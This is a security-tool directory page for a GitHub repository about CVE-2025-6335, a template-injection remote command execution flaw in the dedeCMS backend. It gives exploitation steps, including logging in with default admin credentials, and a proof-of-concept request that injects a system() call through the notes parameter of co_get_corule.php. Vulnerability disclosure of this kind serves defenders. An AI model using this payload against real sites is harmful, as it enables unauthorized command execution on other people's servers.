Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6335 — cve报告 | Kitploit
Tools/GitHubGitHub/jujubooom/cve-2025-6335
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjujubooom/cve-2025-6335

CVE-2025-6335

cve报告

View Repository
61 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

BUG_Author: Ewoji

Affected Version: dedeCMS < 5.7.2

Vendor: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

Vulnerability Files:

  • /include/dedetag.class.php

Description:

  1. After installation,Log in to the background

    • Use the default account password admin/admin
  2. Exploiting the Template

    • Access the dede/co_get_corule.php interface
    • Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command
  3. Verifying the Exploit:

    • If the injection is successful, the attacker will execute arbitrary commands

Proof of Concept:

root@kitploit:~
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command

detail:CVE-2025-6335-dedeCMS backend template injection RCE

Download Tool